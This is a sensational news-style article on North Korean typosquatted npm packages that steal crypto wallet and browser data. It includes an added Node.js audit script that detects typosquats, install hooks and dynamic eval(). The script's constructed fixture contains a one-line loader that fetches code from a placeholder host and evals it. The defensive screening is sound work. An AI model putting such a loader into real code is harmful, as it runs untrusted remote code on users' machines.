North Korean hackers have released a wave of attacks on the npm ecosystem, uploading multiple malicious packages between August 12-27, 2024. The packages—with names like temp-etherscan-api, ethersscan-api, and telegram-con—are part of the notorious “Contagious Interview” campaign. Classic North Korea. They just can’t help themselves when it comes to stealing crypto.
These aren’t your average script kiddies. The attackers used multi-stage obfuscated JavaScript that downloads additional malware after installation. Smart. Devious. Effective. The malware specifically targets cryptocurrency wallets and browser data, because of course it does—North Korea needs funds, and they’re not exactly swimming in legitimate income sources.
North Korea’s hackers deploy sophisticated JavaScript traps that hunt your crypto like digital bloodhounds. Desperate regimes require desperate measures.
The malicious code is particularly nasty. It systematically extracts sensitive data from crypto wallet extensions, establishes persistence on victim machines, and even comes with a full Python interpreter for extra functionality. It hunts through Chrome, Brave, Firefox, and even digs into the macOS keychain. Nothing is safe. Not your passwords, not your crypto.
Security researchers have linked these attacks to several North Korean threat groups, including Famous Chollima and Moonstone Sleet. The infamous Lazarus Group is likely directing the larger cryptocurrency heists. They’re coordinating their efforts like never before. The North Korean operation known as Stressed Pungsan has been directly tied to these state-backed hacking activities. Additional malicious packages like helmet-validate and qq-console were also identified by Phylum researchers as part of this campaign.
The scale is alarming—over 330 downloads of these malicious packages have been detected. Hundreds of companies have been targeted globally. In February 2025, attackers stole over $1.5 billion from Bybit exchange in what’s likely a related operation. Just let that sink in. $1.5 billion.
These attacks highlight the growing risks in open-source software supply chains. The hackers are using clever tactics—typosquatting popular packages, hiding malicious code in innocent-looking functions, and using eval() to execute remote code. They’re good at cleaning up their tracks, too.
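As an added illustration of how a defender can screen a package for exactly the tactics named above (this is not code from the article or from any of the research teams it cites), the following Node.js script audits a manifest and its JavaScript files for a typosquatted name, install-time hooks, and eval() applied to non-literal input. The watch-list of popular names, the manifest and the source files are constructed sample data; the host in the sample loader is a placeholder.

```javascript
// Added example, not code from the article or from the researchers it cites: a
// pre-install audit of an npm manifest plus its JS files for three tactics named
// above (typosquat name, install hook, eval of non-literal input). All inputs below
// are constructed for the demo.
const POPULAR = ['etherscan-api', 'telegram', 'helmet']; // constructed watch-list

// Levenshtein distance: catches one-character squats such as "ethersscan-api".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
    }
  }
  return d[a.length][b.length];
}

// Returns the popular name a package imitates, or null. Affix squats such as
// "temp-etherscan-api" or "telegram-con" are caught by dash-delimited prefix/suffix.
function typosquatOf(name) {
  for (const p of POPULAR) {
    if (name === p) return null;
    const affixed = name.startsWith(p + '-') || name.endsWith('-' + p);
    if (affixed || editDistance(name, p) <= 2) return p;
  }
  return null;
}

const HOOKS = ['preinstall', 'install', 'postinstall'];
// eval()/Function() whose argument is not a string literal: decoded or downloaded code.
const DYNAMIC_EVAL = /\b(eval|Function)\s*\(\s*(?!['"`])\S/;

function auditPackage(pkg, sources) {
  const findings = [];
  const squat = typosquatOf(pkg.name);
  if (squat) findings.push(`name "${pkg.name}" imitates "${squat}"`);
  for (const h of HOOKS) {
    if (pkg.scripts && pkg.scripts[h]) findings.push(`${h} hook runs: ${pkg.scripts[h]}`);
  }
  for (const [file, code] of Object.entries(sources)) {
    if (DYNAMIC_EVAL.test(code)) findings.push(`${file}: eval/Function on non-literal input`);
  }
  return findings;
}

// Constructed sample: squatted name, postinstall hook, innocent-looking index.js,
// and a loader that evals whatever an HTTP response returns (placeholder host).
const samplePkg = { name: 'ethersscan-api', scripts: { postinstall: 'node setup.js' } };
const sampleSources = {
  'index.js': "exports.balance = (a) => fetch('https://api.etherscan.io/?a=' + a).then(r => r.json());",
  'setup.js': "require('https').get('http://stage.invalid/p', r => { let b = ''; r.on('data', c => b += c); r.on('end', () => eval(b)); });",
};
console.log(auditPackage(samplePkg, sampleSources)); // 3 findings
```

The name check is a low-confidence signal on its own (a legitimate scoped helper can share a prefix), so treat a hit as a reason to read the install hook and sources, not as a verdict.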
The stakes couldn’t be higher. Developer machines are prime targets. Software supply chains are vulnerable. And North Korea? They’re laughing all the way to their cryptocurrency wallets.